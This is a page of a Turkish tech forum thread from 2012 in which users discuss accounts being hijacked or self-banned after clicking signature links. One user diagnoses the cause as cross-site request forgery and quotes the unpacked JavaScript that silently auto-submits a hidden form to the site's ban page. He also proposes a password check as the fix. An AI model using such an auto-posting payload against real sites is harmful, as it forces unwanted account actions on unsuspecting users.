Şimdi Ara

Hesap Çalınmaları Hk. (8. sayfa)

Daha Fazla
Bu Konudaki Kullanıcılar: Daha Az
2 Misafir - 2 Masaüstü
5 sn
478
Cevap
3
Favori
13.701
Tıklama
Daha Fazla
İstatistik
  • Konu İstatistikleri Yükleniyor
0 oy
Öne Çıkar
Sayfa: önceki 678910
Sayfaya Git
Git
sonraki
Giriş
  • Bi dk ya bu hesabı hacklenenler şimdi virüs mü yedi? Hay başlayacam böyle işe. İfşa edecem deyip duruyorsunuz söylesenize kim yapmış. Şimdi virüs mü var bu pc'de biri açıklasın noktayı koysun.
  • quote:

Orijinalden alıntı: remiles01

her şeyi gün reis mi yapmış yani ayıp

Gönderdikleri select field'ın adı gun
  • Beyler saf olmayın, virüs falan yok ortada. Forumdaki çoğu komut adres çubuğundan gönderilebiliyor. Zaten bunu anlayan biri nasıl yapıldığını 3 aşağı 5 yukarı çözer. Her linke tıklamayın.

< Bu ileti mobil sürüm kullanılarak atıldı >
  • quote:

Orijinalden alıntı: Barış.

quote:

Orijinalden alıntı: Emmesen

çok feci halde cek.php ye giresim varrrrr engel olamıyorum kendime

sıyırdım heralde girmek istiyorum o sayfaya da gider üyelik

harbiden ya. ben de çok merak ettim. hazır virüsü yiyen birisi sitenin ss'inin alabilirse çok seviniriz

[sizer]Hesap Çalınmaları Hk.

< Bu mesaj bu kişi tarafından değiştirildi Soran Adam -- 18 Ağustos 2012; 17:02:23 >

• Arkadaşlar ID numara sırasına göre hesapları açıyorum. Biraz zaman alabilir, sabrınız için teşekkürler.
  • çok sakat var

< Bu ileti mobil sürüm kullanılarak atıldı >
  • quote:

Orijinalden alıntı: Oziko

Adamın yazdığı Javascript kodunu inceledim de, reklamını zombi kullanıcıların avatarında yapmaya çalışmış sanırsam, en can alıcı noktada başarısız olmuş yazık.

Yani virüs mirüs var mı yok mu şimdi? Buraya tıkladığımız için pc temiz mi kirli mi? Boşu boşuna format atmak istemiyorum.
  • benim için bir yöneticiye ulaşırmısınız

http://forum.donanimhaber.com/m_64749689/tm.htm

o imzaya tıkladım ve sonuç;
    Hesabınız 30 gün süre ile erişime kapatılmıştır. aynen böyle yazıyo;

Tekrar mesaj yazabilmeniz için 30 gün 0 sa. 56 dk. kaldı. Açılma tarihi: 17 Eylül 2012; 16:35:23, Nedeni: Kullanıcı isteği!

--

bi yöneticiye attığım bu mesajı kopyalayıp atsan nickim; ChicaritoHernandez
    lütfen yardım.

--------------

arkadaş bu mesajı iletmemi söyledi.saygılar

< Bu mesaj bu kişi tarafından değiştirildi tany3450 -- 18 Ağustos 2012; 17:03:54 >
  • quote:

Orijinalden alıntı: Kartal Göz

quote:

Orijinalden alıntı: Oziko

Adamın yazdığı Javascript kodunu inceledim de, reklamını zombi kullanıcıların avatarında yapmaya çalışmış sanırsam, en can alıcı noktada başarısız olmuş yazık.

Yani virüs mirüs var mı yok mu şimdi? Buraya tıkladığımız için pc temiz mi kirli mi? Boşu boşuna format atmak istemiyorum.

Yukarıdaki mesajlarıma bak virüs falan yok.Sebebini yazdım olayların geçmiş olsun bu arada.
  • çok görmek isteyen varsa siteden çıkış yapsın tıklasın linke birşey yok direk scripte yönlendiriyor oda boş sayfa

< Bu mesaj bu kişi tarafından değiştirildi Ignite -- 18 Ağustos 2012; 17:04:36 >
  • Beyler şimsi hatırladım, birisi bir konu açmıştı galiba oy verir misiniz diyeydi, lolchampionship gibi bir adresti, ordan olmuş olabilir.

< Bu ileti tablet sürüm kullanılarak atıldı >
  • quote:

Orijinalden alıntı: Kril

quote:

Orijinalden alıntı: furkan19o7

quote:

Orijinalden alıntı: Kril

Olayların sorumlusunu ifşa etsem mi acaba?

beyler adamın imzasına bakın php kodları var
    peki bizim yedigimiz sayfa neydi cek.php

bu adam her konuya aynı seyı yazıyor bu yaptı banlayın bunu

Lol nasıl da heyecan yapmış =D Bi' kere o kod ansi C/C kodu. Bense sadece dikkat çekmeye çalışan herhangi bir ergen olabilirim.

zaten dillerde cogu sey aynı return include printf i gorunce bastım php yi

• Adam sitenin tepesine reklam yapmış
  • quote:

Orijinalden alıntı: rds

Arkadaşlar ID numara sırasına göre hesapları açıyorum. Biraz zaman alabilir, sabrınız için teşekkürler.

Yukarıdaki mesajımda sorunun nedeni var daha konu dışı'na girmeyen üyeler var.Akşam yine bu olaylar türer biraz soğur yine türer bu olay.En kısa yol önceki mesajımda yazdığım.O adreste kesinlikle bir virüs yardımıyla bu işlemler gerçekleşmiyor.Direk olark verileri buraya yolluyorlar.
    Siz o linke tıkladığınızda uzaklas.asp'deki gun isimle select alanına rastgele belirledikleri bir sayıyı javascript post metoduyla yolluyorlar.
    quote:

//eval _3162=_7911 //eval _9818=_3162 //eval _3611=_6344 //eval function post_to_url(path, params, method) {method = method || "post";var form = document.createElement("form");//Move the submit function to another variable//so that it doesn't get overwritten.form._submit_function_ = form.submit;form.setAttribute("method", method);form.setAttribute("action", path);for(var key in params) {var hiddenField = document.createElement("input");hiddenField.setAttribute("type", "hidden");hiddenField.setAttribute("name", key);hiddenField.setAttribute("value", params[key]);form.appendChild(hiddenField);}document.body.appendChild(form);form._submit_function_();} $(document).ready(function() { post_to_url("http://resim.donanimhaber.com/uzaklas.asp", { gun: "3" }); }); //jsunpack.url var _6344 = function post_to_url(path, params, method) {method = method || "post";var form = document.createElement("form");//Move the submit function to another variable//so that it doesn't get overwritten.form._submit //jsunpack.url var _3611 = function post_to_url(path, params, method) {method = method || "post";var form = document.createElement("form");//Move the submit function to another variable//so that it doesn't get overwritten.form._submit

Profildeki değişiklikler de aynı mantıkla yapılıyor.
    Sorunun çözümü basit:Bu tür değişikliklerin yapıldığı sayfalarda şifre alanı olacak.

< Bu mesaj bu kişi tarafından değiştirildi hckr -- 18 Ağustos 2012; 17:07:39 >

• quote:

Orijinalden alıntı: rds

Arkadaşlar ID numara sırasına göre hesapları açıyorum. Biraz zaman alabilir, sabrınız için teşekkürler.

Benim şifre de değiştirilmiş. Nasıl giriş yapacağım?
  • komik lan bu forum
  • Forumdaki eski bilgilerimize ulaşabilecek miyiz? Tekrar soruyorum bir türlü cevap alamıyorum.
  • Virüs veya hesap çalınma sıkıntısı yok arkadaşlar rahat olun. 350 bin civarı dosya tarattım , çıkan sonuç aşağıda...

[sizer]Hesap Çalınmaları Hk.
    < Bu mesaj bir yönetici tarafından değiştirilmiştir >
  • quote:

Orijinalden alıntı: Jason Becker

quote:

Orijinalden alıntı: hckr

Sorunun ne olduğunu tam anlamıyla çözdüm yöneticiler eğer bilgiye ihtiyaç duyuyorlarsa PM atsınlar.

Sherlcok Holmes Mod: On

Hacker bu beyler.

Aklı sıra kahramanlık yapıp yönetici olmak için göze girecek. Kendi yaptığı saldırıyı deşifre ediyor.

Sherlock Holmes Mod: Off

Hacker değilim.Sitede virüs de yok ne yaptıklarını anlattım çözümü de anlattım.Kullanıcı adımın hacker kelimesi ile alakası yoktur

< Bu mesaj bu kişi tarafından değiştirildi hckr -- 18 Ağustos 2012; 17:11:46 >

• Hesabım çalınmıştı hemen mail attım ve açıldı, veya rdsnin dediğini yapıp e-mail deiştirdiğim içinde düzelmiş olabilir. neyse imza avatar herşey gitmiş bi ara onları yenilemek gerekicek.
  • 
Sayfa: önceki 678910
Sayfaya Git
Git
sonraki
- x
Bildirim
mesajınız kopyalandı (ctrl+v) yapıştırmak istediğiniz yere yapıştırabilirsiniz.